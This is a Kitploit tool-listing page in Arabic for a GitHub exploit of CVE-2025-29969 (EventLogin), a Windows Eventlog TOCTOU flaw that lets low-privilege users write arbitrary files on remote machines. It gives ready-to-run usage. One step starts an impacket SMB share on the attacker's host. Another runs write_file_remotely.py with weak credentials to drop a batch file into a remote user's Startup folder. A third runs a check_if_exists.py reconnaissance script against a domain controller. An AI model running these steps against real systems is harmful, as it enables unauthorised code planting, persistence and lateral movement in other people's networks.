Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
EventLogin-CVE-2025-29969 — استغلال CVE-2025-29969 | Kitploit
أدوات/GitHubGitHub/safebreach-labs/eventlogin-cve-2025-29969
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاختبار الاختراق
GitHubsafebreach-labs/eventlogin-cve-2025-29969

EventLogin-CVE-2025-29969

استغلال CVE-2025-29969

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
6915منذ 6 أشهرتمت المراجعة من قبل Kitploit

EventLogin - CVE-2025-29969

EventLogin هي ثغرة من نوع Time-of-check time-of-use (TOCTOU) في بروتوكول MS-EVEN. تُمكّن هذه الثغرة المستخدمين ذوي الصلاحيات المنخفضة من كتابة ملفات عشوائية على جهاز بعيد، مما يتجاوز فعليًا الحاجة إلى حساب مسؤول للكتابة عن بُعد.

يوجد نصان برمجيان في هذا المستودع، الأول يستغل الثغرة (write_file_remotely.py)، والآخر يستخدم إحدى بدائيات الثغرة للتحقق من وجود ملف عن بُعد أو عدمه، كمستخدم منخفض الصلاحية، وهو مفيد، على سبيل المثال، لرؤية البرامج المثبتة على أجهزة أخرى في المجال.

يمكنك قراءة التحليل الكامل هنا:

EventLog-in: الانتشار باستخدام بيانات اعتماد ضعيفة عبر خدمة Eventlog في Microsoft Windows

استخدام write_file_remotely

أولاً، أنشئ مشاركة SMB باستخدام impacket:

root@kitploit:~
impacket-smbserver -smb2support Share /tmp/safebreach

ملاحظة: يستخدم النص البرمجي 'Share' كاسم مشاركة مبرمج بشكل ثابت، قم بتعديله إذا لزم الأمر.

ثم، قم بتشغيل النص البرمجي write_file_remotely.py مع تضمين جميع المعاملات المطلوبة:

  1. ip_to_attack - عنوان IP للجهاز البعيد.
  2. smb_server_ip - عنوان IP للجهاز الذي فتحت عليه المشاركة، يمكن أن يكون جهاز المهاجم.
  3. username و password - بيانات اعتماد الحساب منخفض الصلاحية.
  4. valid_evtx_file_path - مسار إلى ملف EVTX صالح تخزنه في نفس المشاركة التي فتحتها مسبقًا.
  5. local_file_path - الملف الذي تريد رفعه.
  6. remote_file_path - مسار الملف البعيد الذي تريد الرفع إليه.

مثال:

root@kitploit:~
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat"

استخدام check_if_exists

هذا النص البرمجي لا يستخدم الثغرة بذاتها، بل يستخدم فقط بدائية "CreateFile" ويمكن أن يساعدك في استطلاع الشبكة.

على سبيل المثال، دليل Program Files لجهاز بعيد في مجال ما يمكن الوصول إليه من قبل مجموعة 'Users' بأكملها، مما يعني أنه باستخدام بيانات اعتماد أي مستخدم يمكنك التحقق من وجود ملف أو عدمه في جهاز آخر.

يقبل المعاملات التالية:

  1. ip_to_attack - عنوان IP للاستطلاع
  2. username - اسم المستخدم وكلمة مرور مستخدم المجال.
  3. filepath_to_check - ملف للتحقق منه

على سبيل المثال، تحقق مما إذا كان Wireshark مثبتًا على وحدة التحكم بالمجال (192.168.56.57) باستخدام مستخدم منخفض الصلاحية.

root@kitploit:~
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"

Result:
FILE_EXISTS_AND_IS_DIRECTORY
تنزيل الأداة